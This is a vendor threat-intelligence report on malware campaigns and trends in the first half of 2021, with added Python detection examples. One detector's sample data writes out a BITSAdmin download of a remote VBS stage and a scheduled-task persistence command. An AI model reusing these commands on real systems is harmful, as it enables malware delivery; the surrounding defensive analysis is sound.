



HP WOLF SECURITY
THREAT INSIGHTS REPORT
1H 2021







THREAT LANDSCAPE 


Welcome to the 1H 2021 edition of the HP Wolf Security Threat Insights Report. Here our security experts highlight malware trends 
identified by HP Wolf Security from the first half of 2021 so that security teams are equipped with the knowledge to combat emerging 
threats and improve their security postures. 


Most attacks involving malware are financially motivated, meaning threat actors seek the quickest route to monetize their access. 

In the case of information stealers and remote access Trojans (RATs), this is typically selling confidential data stored on victims' 
computers. However, increasingly attackers are deciding to sell their access to other threat actors, especially if an infected system is 
joined to an Active Directory domain — an indicator that the system is part of a larger fleet that may be open to lateral movement. 


Cybercriminals' growing demand for unauthorized access has been largely driven by ransomware affiliates needing entry points into 
networks. Technological improvements to communication tools and hard-to-trace cryptocurrencies have also made it easier for 
threat actors to collaborate with each other, either directly as part of organized crews or indirectly by trading illicit goods and services. 
As a result, unauthorized access sold by less-resourced threat actors may end up in the hands of well-funded and experienced 
ransomware-as-a-service (RaaS) affiliates. The initial compromise of one system can therefore escalate into an incident that has a 
large impact on business continuity. 


NOTABLE THREATS 


Hacking tools on the rise 


HP Wolf Security telemetry in H1 2021 saw a 65% increase in hacking tools downloaded from filesharing websites and underground 
forums compared to the second half of 2020. One way to assess the risk posed by different types of threats is to consider the factors 
that drive and enable threat actors, such as desire, expectation, knowledge, and resources. The increase in hacking tool activity may 
indicate an increase in attacker intent, i.e. the desire to perform attacks and the expectation they will succeed. It also points to the 
widespread availability of hacking tools within the cybercrime ecosystem, i.e. the resources at the attackers' disposal. A big driver of 
why hacking tools are so easy to obtain is widespread malware piracy or "cracking", enabling anyone to use tools without payment, 
even if developers intended otherwise. 
Figure 1 – The main drivers of threats 

















Knowledge sharing also feeds into our threat assessment of hacking tools. Underground forums and chatrooms provide ideal 
platforms for threat actors to share tactics, techniques and procedures (TTPs), or buy and sell stolen data or unauthorized access. 
For example, in March, HP Wolf Security detected a user downloading a cracked copy of Sentry MBA from a Turkish-language 
cracking forum. This popular hacking tool is used to perform credential stuffing — a technique where attackers try to authenticate to 
websites using lists of compromised credentials. Sentry MBA's capabilities include features to bypass website security controls, such 
as CAPTCHA challenges and web application firewalls. Threat actors can either use pre-bundled optical character recognition (OCR) 
computer vision models or configure the tool to query the APIs of third-party CAPTCHA-solving services during an attack. 
Figures 2 & 3 — A cracked copy of the Sentry MBA credential stuffing tool and CAPTCHA character sets, downloaded from a cracking forum 


As of July 2021, we found numerous active forums dedicated to sharing configurations and tips about using Sentry MBA against 
specific websites and devices, demonstrating the popularity of such tools and the low barrier to entry for this type of cybercrime. 
Figure 4 — An English-language forum section dedicated to sharing Sentry MBA configurations in July 2021 


Multi-stage downloader used to target business executives 


In March 2021, HP Wolf Security isolated a multi-stage Visual Basic Script (VBS) malware campaign targeting senior business 
executives. The targets received a malicious ZIP attachment by email, named using their first and last names. It is likely the threat 
actor obtained employee names and email addresses from publicly available information online. The archives contained an obfuscated 
VBS downloader that downloads a second VBS script from a remote server to the user's %TEMP% folder. The first stage script was 
heavily obfuscated and had a low detection rate: only 21% of anti-virus scanners on VirusTotal detected it as malicious. 





The second stage was downloaded using BITSAdmin, a legitimate file transfer tool built into Windows. Threat actors commonly 
employ a tactic known as living off the land, where operating system administrative tools and features are used to perform malicious 
actions, which reduces the likelihood of detection. To establish persistence on the system, the script creates a scheduled task to run the 
file with Windows Script Host (cscript.exe). 
Figure 5 — An isolated sample of the VBS downloader in HP Wolf Security Controller showing a BITSAdmin download command 


The second stage downloads a third obfuscated VBS file using BITSAdmin to %LOCALAPPDATA%\Temp. Depending on the size of 
the downloaded file, the third stage is either run as a VBS file or as a portable executable — possibly a final payload. The attacker’s 
command and control (C2) infrastructure was not actively serving the third stage at the time of analysis, so it was not possible to 
confirm what malware would have been delivered. 
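A detection written for the chain described above, added here as an example and not HP's code or detection rules: it correlates constructed Sysmon-style process-creation records to flag a bitsadmin.exe transfer of a script into a temp directory followed by a scheduled-task creation that runs it with Windows Script Host. The use of schtasks.exe to create the task and the record field names are assumptions; the report only states that a scheduled task running cscript.exe is created.

```python
import re

# Constructed process-creation records in a Sysmon Event ID 1 style; not HP telemetry.
# The first three mirror the report's chain: a VBS launched from Downloads spawns a
# BITSAdmin transfer into the user's temp folder and then (assumed) schtasks.exe to
# register a task that runs the fetched script with cscript.exe. The last record is a
# legitimate-looking BITS transfer included to show the filter does not fire on it.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3900, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\ceo\Downloads\Jane_Doe.vbs"'},
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://198.51.100.7/stage2.vbs C:\Users\ceo\AppData\Local\Temp\stage2.vbs"},
    {"pid": 4201, "ppid": 4120, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Updater '
                r'/tr "cscript.exe C:\Users\ceo\AppData\Local\Temp\stage2.vbs"'},
    {"pid": 5000, "ppid": 800, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer drv /download https://example.invalid/driver.cab "
                r"C:\ProgramData\driver.cab"},
]

# Both %TEMP% and %LOCALAPPDATA%\Temp are named in the report as drop locations.
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Temp\\|%TEMP%|%LOCALAPPDATA%", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)


def bits_download_to_temp(ev):
    """bitsadmin.exe transferring a script file into a user temp directory."""
    return (ev["image"].lower().endswith("bitsadmin.exe")
            and "/transfer" in ev["cmdline"].lower()
            and bool(TEMP_DIR.search(ev["cmdline"]))
            and bool(SCRIPT_EXT.search(ev["cmdline"])))


def task_runs_wsh_script(ev):
    """schtasks.exe creating a task whose action runs a temp-dir script via cscript/wscript."""
    c = ev["cmdline"].lower()
    return (ev["image"].lower().endswith("schtasks.exe") and "/create" in c
            and ("cscript" in c or "wscript" in c)
            and bool(TEMP_DIR.search(ev["cmdline"])))


def find_downloader_chains(events):
    """Return (bitsadmin_pid, schtasks_pid) pairs that share the same parent process.

    Either signal alone is noisy (BITS transfers and task creation both happen
    legitimately); requiring both from one parent is what makes this a
    high-confidence living-off-the-land downloader detection."""
    downloads = {e["ppid"]: e["pid"] for e in events if bits_download_to_temp(e)}
    chains = []
    for e in events:
        if task_runs_wsh_script(e) and e["ppid"] in downloads:
            chains.append((downloads[e["ppid"]], e["pid"]))
    return chains


if __name__ == "__main__":
    for dl, task in find_downloader_chains(SAMPLE_EVENTS):
        print(f"suspicious chain: bitsadmin pid {dl} -> schtasks pid {task}")
```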


Businesses targeted in resume-themed phishing campaigns delivering Remcos 


In January 2021, HP Wolf Security isolated a malicious spam campaign targeting businesses in seven countries (Chile, Italy, Japan, 
Pakistan, Philippines, UK, and US). The emails purported to be from job applicants and contained malicious Rich Text Format (RTF) 
documents that exploited CVE-2017-11882, a vulnerability in Microsoft Office's Equation Editor. If successfully exploited, the 
documents downloaded and ran Remcos on the infected system. The threat actor used a subdomain from a dynamic DNS service 
(gotdns[.]ch) as their C2 server. Remcos is a commercially available RAT giving backdoor access to an infected computer. 

TARGETED SECTORS: 
* MANUFACTURING 
* SHIPPING 
* COMMODITY TRADING 
* MARITIME 
* PROPERTY 
* INDUSTRIAL SUPPLIES 
Figure 6 — Malicious email posing as job applicant (sent January 28, 2021 with the subject "Assistant Accounts Officer"; the attached resume .doc was flagged as Document-Office.Exploit.CVE-2017-11882) 


CryptBot used to distribute DanaBot 


In May 2021, HP Wolf Security detected a campaign delivering CryptBot, an information stealer that harvests system and web browser 
credentials and cryptocurrency wallets. Rather than being used as an infostealer, CryptBot was used to drop a banking Trojan, DanaBot, 
as a follow-up infection. DanaBot is a family of malware associated with the financial crime group TA547. Threat actors regularly 
repurpose malware and other tools by using them to achieve objectives that they weren't necessarily developed for, such as using a 
stealer to deploy other malware. 
Figure 7 — Process interaction graph showing CryptBot downloading and running DanaBot, safely inside an HP Wolf Security micro-VM 


Code reuse rife among commodity information-stealing malware 


Snake is a modular .NET keylogger and credential stealer first spotted in late November 2020. In H1 2021, the HP threat research 
team has regularly seen malicious spam campaigns distributing this malware family in RTF or archive attachments. An analysis of 
Snake's code revealed similarities between it and four other keylogger families active in the last two years. This "remix" behavior of 
opportunistically copying source code from established malware families demonstrates how easy it is for cybercriminals to create their 
own malware-as-a-service businesses — and the importance for enterprise defenses to stay ahead of malware developers. 
Figure 8 — Comparison of keystroke exfiltration functions between Snake and Matiex keyloggers 


Purple Fox compromises Internet Explorer users with CVE-2021-26411 exploit 


HP Wolf Security telemetry saw an increase in the number of isolated Purple Fox exploit kit (EK) samples encountered by users. 
In one campaign in April 2021, HP Wolf Security prevented a customer from compromise because their web browser session 
was running inside a micro-VM. The sample attempted to exploit a memory corruption vulnerability in Internet Explorer 
(CVE-2021-26411), a new addition to Purple Fox's exploit arsenal. The exploit code resembled a proof of concept (PoC) released to 
the public in mid-March 2021. The time from the PoC to in the wild sightings was a matter of weeks, meaning organizations only had 
a small window to patch before risking compromise by Purple Fox. 


The user encountered Purple Fox after searching for an Arabic-language term ("Form-extension-visit-" in English) in a search 
engine. The user clicked on a search result (loislandgraf[.]us), which then led them to a webpage that attempted to deliver the 
exploit via several redirects. During the analysis, we noticed that the exploit was not triggered in every case, likely because 
geo-fencing was used to control which systems were compromised. Italy, Switzerland, Ireland, Sweden, and Japan were among the 
countries that triggered the infection chain, although this is not an exhaustive list. 








NOTABLE TRENDS 


Archives are now the most popular malware delivery file type 


Archives were the top malware delivery file type in H1 2021, overtaking documents in H2 2020. The increase was partially 
driven by attackers switching to malicious Java Archive (JAR) files to deliver their malware in email attachments. When opened, 
the JAR files unpack and run a payload on the victim's PC if the Java Runtime Environment is installed. The most common payloads we 
saw were low-cost RATs that are easily bought or obtained from underground marketplaces, such as AdWind. 
Figure 9 – Timeline showing the history of CVE-2021-26411 


Figure 10 — Threats isolated by HP Wolf Security by file type in 1H 2021 (bar chart titled "Isolated threats by file type H1 2021"; categories shown include spreadsheets, executables, documents, web pages, presentations, PDFs and other) 
The top email lures associated with these campaigns were purchase orders, invoices, product specifications, RFQs, and quality control 
reports - suggesting that the attackers are interested in targeting businesses rather than individuals. 


We also saw a continuation of attacks involving unusual archive file types to deliver commodity malware, for example by compressing 
malware inside .Z, .ARJ, and .XZ archives. One reason why attackers might prefer exotic file types is that email gateway scanners are 
less likely to be able to decompress and examine files that use unpopular formats, thereby increasing the chances of a malicious email 
reaching a target’s inbox. 
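An added example of the gateway-side check this paragraph and the JAR paragraph above call for; it is not HP's code. It identifies attachments by their leading bytes rather than their extension, distinguishes JARs from plain ZIPs by the manifest, and quarantines anything the (hypothetical) gateway cannot unpack, such as .Z, .ARJ and .XZ, or whose content does not match its name. The set of formats the gateway can unpack, and all sample attachments, are constructed for the example.

```python
import io
import zipfile
from typing import Optional

# Leading bytes of the archive formats named in the report plus the common ones.
MAGIC = [
    (b"\xfd7zXZ\x00", "xz"),            # .xz
    (b"\x1f\x9d", "compress-Z"),         # .Z (Unix compress)
    (b"\x60\xea", "arj"),                # .arj
    (b"\x1f\x8b", "gzip"),
    (b"Rar!\x1a\x07", "rar"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"PK\x03\x04", "zip"),
]
# Assumed capability of this gateway: it can open these but not .Z, .ARJ or .XZ.
GATEWAY_CAN_UNPACK = {"zip", "gzip", "rar", "7z"}
EXPECTED_EXT = {"zip": {"zip"}, "jar": {"jar"}, "gzip": {"gz", "tgz"}, "rar": {"rar"},
                "7z": {"7z"}, "xz": {"xz", "txz"}, "compress-Z": {"z"}, "arj": {"arj"}}


def is_jar(data: bytes) -> bool:
    """A JAR is a ZIP whose member list contains META-INF/MANIFEST.MF."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return "META-INF/MANIFEST.MF" in zf.namelist()
    except zipfile.BadZipFile:
        return False


def identify_archive(data: bytes) -> Optional[str]:
    """Identify by content, never by extension, so a renamed archive is still caught."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return "jar" if name == "zip" and is_jar(data) else name
    return None


def triage_attachment(filename: str, data: bytes) -> str:
    """Return 'pass' (not an archive), 'scan' (unpack and inspect) or 'quarantine'."""
    fmt = identify_archive(data)
    if fmt is None:
        return "pass"
    if fmt == "jar":
        return "quarantine"   # runs a payload on open wherever a JRE is installed
    if fmt not in GATEWAY_CAN_UNPACK:
        return "quarantine"   # cannot look inside, so do not let it through unexamined
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in EXPECTED_EXT[fmt]:
        return "quarantine"   # archive content behind an unrelated extension
    return "scan"


def build_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample attachments (header bytes only where the body does not matter).
SAMPLES = {
    "PO-4471.jar": build_zip({"META-INF/MANIFEST.MF": b"Main-Class: a\n", "a.class": b"\xca\xfe\xba\xbe"}),
    "quote.zip": build_zip({"quote.txt": b"unit price list"}),
    "invoice.xz": b"\xfd7zXZ\x00" + b"\x00" * 16,
    "spec.arj": b"\x60\xea" + b"\x00" * 16,
    "report.pdf": b"%PDF-1.7\n",
    "photo.jpg": build_zip({"x.txt": b"y"}),   # ZIP content behind a JPEG name
}


def triage_all(samples=SAMPLES) -> dict:
    return {name: triage_attachment(name, data) for name, data in samples.items()}
```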


Excel spreadsheets were the second most popular file type used to deliver malware. This was driven by large malicious spam 
campaigns distributing crimeware families such as Dridex, IcedID, and TrickBot. We also saw attackers distribute commodity stealers 
such as Formbook using Excel spreadsheets, but on a much smaller scale. HP Wolf Security data suggests that crimeware actors 
prefer to use spreadsheets to deliver their malware, while smaller, less organized actors prefer to use archives. 





Compared to H2 2020, HP Wolf Security telemetry saw a 24% increase in threats downloaded using web browsers. This was partially 
driven by users downloading hacking tools and cryptocurrency mining software. Email remained the top infection vector, with 75% of 
threats isolated by HP Wolf Security delivered by email in H1 2021. About one third (34%) of threats were unknown by hash to 
anti-virus scanners at the time of detection in 1H 2021, a 4% drop from 2H 2020. 


75% OF THREATS ISOLATED BY HP WOLF SECURITY WERE DELIVERED BY EMAIL IN H1 2021. THE REMAINING 25% WERE WEB DOWNLOADS. 


COVID-19 email lures fall out of fashion 


Nearly half (49%) of lures used in malicious emails isolated by HP Wolf Security were themed as business transactions. This 
demonstrates that while cybercriminals are becoming more organized, users are still falling for the same old tricks, downloading risky 
files and clicking on malicious attachments and compromised web links. 


Less than 1% of isolated emails used COVID-19 as a lure, suggesting that this topical lure is less effective at tricking users into clicking 
malicious links and attachments. Malware distributors are motivated to maximize their click rates, so prefer to use lures that have 
proven effective generically across different regions. 


Figure 11 — Top email lures of threats isolated by HP Wolf Security in H1 2021 


Dridex overtakes Emotet following law enforcement takedown 


Before the takedown of Emotet on 27 January 2021 by law enforcement agencies, we saw large Emotet campaigns targeting Japanese 
organizations using lures created from stolen email threads — a technique called email thread hijacking. Following the takedown, the 
proportion of malware being distributed via Word documents fell significantly because Emotet's operators preferred to use a Word- 
based downloader. 


The drop in Emotet activity in Q1 2021 has led to Dridex becoming the top malware family isolated by HP Wolf Security. Although 
originating in 2012 as a banking Trojan, since 2017 Dridex's operators have increasingly shifted their preferred monetization method to 
ransomware attacks. Emotet was known to distribute malware associated with other organized threat groups, suggesting that their 
business model involved selling access to hosts compromised by the former banking Trojan. 
Figure 12 - Stolen email data used by Emotet to generate a convincing Japanese-language phishing template (email dated January 21, 2021, with a .doc attachment flagged as Document-Word.Trojan.Emotet) 


Threat actors continue to exploit old Microsoft Office vulnerabilities 


Threat actors are continuing to exploit old vulnerabilities in Microsoft Office, underlining the need for enterprises to patch out-of-date 
Office versions in their environments. We saw a 24% increase in CVE-2017-11882 exploits in H1 2021 compared to H2 2020. Otherwise, 
there was no significant change in the vulnerabilities exploited by attackers over the reporting period. 
Figures 13 & 14 — Top malware families and exploited CVEs isolated by HP Wolf Security in H1 2021 

Figure 15 — MITRE ATT&CK techniques used by threats isolated by HP Wolf Security in H1 2021 


NOTABLE TECHNIQUES 


Detecting the domain infrastructure of TA551 and TA505 


Threat actors tend to be habitual and follow well-defined patterns of behavior. The HP Threat Research team discovered a technique to 
pre-emptively detect the domains used by two threat groups — TA551 and TA505 - before they are used in active malware campaigns. 
By examining keyword patterns in their domains, their preferred DNS providers, and domain registrars, it was possible to identify the 
domain infrastructure of these groups. 


TA505 is a financially motivated threat group first identified in 2014. In recent years their preferred way of making money is by 
extorting victims after infecting them with Clop ransomware. The group typically gains access to their victim networks using Get2 
and SDBBot malware. Before each campaign, the group would register new domains that they would use for malware command and 
control. 


TA551 is a malware distribution group that has been active since the beginning of 2019. They have been seen spreading malware 
families including Ursnif, Valak, IcedID, and Qakbot. 
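An added example of the profiling approach described in this section, not HP's technique or data: it learns a habit profile from domains already attributed to a group (lexical shape of the name, registrar, DNS provider) and flags new registrations that match every habit, so that infrastructure can be blocked before a campaign starts. All domains, registrar names and provider names are constructed placeholders, not TA551 or TA505 indicators.

```python
import re

# Constructed records for illustration; nothing here is a real indicator.
KNOWN_GROUP_DOMAINS = [
    {"domain": "quickparcel12.com", "registrar": "RegistrarA", "dns_provider": "ProviderX"},
    {"domain": "safedocs77.com",    "registrar": "RegistrarA", "dns_provider": "ProviderX"},
    {"domain": "upload-box3.net",   "registrar": "RegistrarA", "dns_provider": "ProviderY"},
]

# Constructed newly registered domains seen in a daily feed.
NEW_REGISTRATIONS = [
    {"domain": "fastledger44.com",  "registrar": "RegistrarA", "dns_provider": "ProviderX"},
    {"domain": "mybank.com",        "registrar": "RegistrarA", "dns_provider": "ProviderX"},
    {"domain": "share-files9.net",  "registrar": "RegistrarB", "dns_provider": "ProviderY"},
    {"domain": "news-today.org",    "registrar": "RegistrarC", "dns_provider": "ProviderZ"},
]


def shape(domain):
    """Reduce a domain to its lexical shape: letter runs -> 'a', digit runs -> '9'.

    'quickparcel12.com' and 'safedocs77.com' both become 'a9.a'. Domains produced by
    one actor's registration tooling tend to share a shape even when the words differ,
    which is the keyword-pattern habit the report describes."""
    s = re.sub(r"[a-z]+", "a", domain.lower())
    return re.sub(r"[0-9]+", "9", s)


def learn_profile(known):
    """Collect the shapes, registrars and DNS providers a group has used before."""
    return {"shapes": {shape(r["domain"]) for r in known},
            "registrars": {r["registrar"] for r in known},
            "dns_providers": {r["dns_provider"] for r in known}}


def matched_habits(record, profile):
    """List which of the three habits a new registration matches."""
    hits = []
    if shape(record["domain"]) in profile["shapes"]:
        hits.append("keyword-shape")
    if record["registrar"] in profile["registrars"]:
        hits.append("registrar")
    if record["dns_provider"] in profile["dns_providers"]:
        hits.append("dns-provider")
    return hits


def flag_new_registrations(new_records, profile, min_hits=3):
    """Domains matching at least min_hits habits are candidates for pre-emptive blocking.

    Requiring all three keeps popular registrars and DNS providers from
    flagging ordinary domains such as 'mybank.com' on their own."""
    return [r["domain"] for r in new_records if len(matched_habits(r, profile)) >= min_hits]


if __name__ == "__main__":
    profile = learn_profile(KNOWN_GROUP_DOMAINS)
    for r in NEW_REGISTRATIONS:
        print(r["domain"], matched_habits(r, profile))
    print("flagged:", flag_new_registrations(NEW_REGISTRATIONS, profile))
```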
Figure 16 — Preferred DNS providers of TA551 over time 


INDICATORS AND TOOLS 


The HP Threat Research team regularly publishes Indicators of Compromise (IOCs), signatures, and tools to help security teams defend 
against threats. You can access these resources from the HP Threat Research GitHub repository. 


STAY CURRENT 


The HP Wolf Security Threat Insights Report is made possible by customers who opt to share their threats with HP. Alerts that are 
forwarded to us are analyzed by our security experts and annotated with additional contextual information about each threat. 


We recommend that customers take the following actions to ensure that you get the most out of your HP Wolf Enterprise Security 
deployments: 


* Enable Threat Intelligence Services and Threat Forwarding in HP Wolf Security Controller. These enable augmented threat 
intelligence for automated threat triage and labeling, plus automatic rules file updates to ensure accurate detection and protection 
against the latest attack techniques. To learn more, review the Knowledge Base articles about these features. 


* Plan to update HP Wolf Security Controller with every new release to receive new dashboards and report templates. See the latest 
release notes and software downloads available on the Customer Portal. 





* Update HP Wolf Security endpoint software at least twice a year to stay current with detection rules added by our threat research 
team. For the latest threat research, head over to the HP Wolf Security blog, where our security experts regularly dissect new threats 
and share their findings. 


ABOUT THE HP WOLF SECURITY THREAT 
INSIGHTS REPORT 


Enterprises are most vulnerable from users opening email attachments, clicking on hyperlinks in emails, and downloading files from 
the web. HP Wolf Security protects the enterprise by isolating risky activity in micro-VMs, ensuring that malware cannot infect the host 
computer or spread onto the corporate network. Since the malware is contained, HP Wolf Security collects rich forensic data to help our 
customers harden their infrastructure. The HP Wolf Security Threat Insights Report highlights notable malware campaigns analyzed by 
our threat research team so that our customers are aware of emerging threats and can take action to protect their environments. 


ABOUT HP WOLF SECURITY 


From the maker of the world's most secure PCs and printers, HP Wolf Security is a new breed of endpoint security. HP's portfolio of 
hardware-enforced security and endpoint-focused security services is designed to help organizations safeguard PCs, printers, and 
people from circling cyber predators. HP Wolf Security provides comprehensive endpoint protection and resiliency that starts at the 
hardware level and extends across software and services. 
HP Wolf Enterprise Security is an optional service and may include offerings such as HP Sure Click Enterprise and HP Sure Access Enterprise. HP Sure Click 
Enterprise requires Windows 8 or 10 and Microsoft Internet Explorer, Google Chrome, Chromium or Firefox are supported. Supported attachments include 
Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. HP Sure Access Enterprise requires Windows 10 
Pro or Enterprise. HP services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. 
Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of 
service or the HP Limited Warranty provided with your HP Product. For full system requirements, please visit www.hpdaas.com/requirements. 

HP Wolf Security Controller requires HP Sure Click Enterprise or HP Sure Access Enterprise. HP Wolf Security Controller is a management and analytics platform 
that provides critical data around devices and applications and is not sold as a standalone service. HP Wolf Security Controller follows stringent GDPR privacy 
regulations and is ISO 27001, ISO 27017 and SOC 2 Type 2 certified for Information Security. Internet access with connection to the HP Cloud is required. For full 
system requirements, please visit http://www.hpdaas.com/requirements. 

Based on HP's unique and comprehensive security capabilities at no additional cost among vendors on HP Elite PCs with Windows and 8th Gen and higher Intel® 
processors or AMD Ryzen™ 4000 processors and higher; HP ProDesk 600 G6 with Intel® 10th Gen and higher processors; and HP ProBook 600 with AMD Ryzen™ 
4000 or Intel® 11th Gen processors and higher. 

HP's most advanced embedded security features are available on HP Enterprise and HP Managed devices with HP FutureSmart firmware 4.5 or above. Claim 
based on HP review of 2021 published features of competitive in-class printers. Only HP offers a combination of security features to automatically detect, stop, 
and recover from attacks with a self-healing reboot, in alignment with NIST SP 800-193 guidelines for device cyber resiliency. For a list of compatible products, 
visit: hp.com/go/PrintersThatProtect. For more information, visit: hp.com/go/PrinterSecurityClaims. 

HP Security is now HP Wolf Security. Security features vary by platform, please see product data sheet for details. 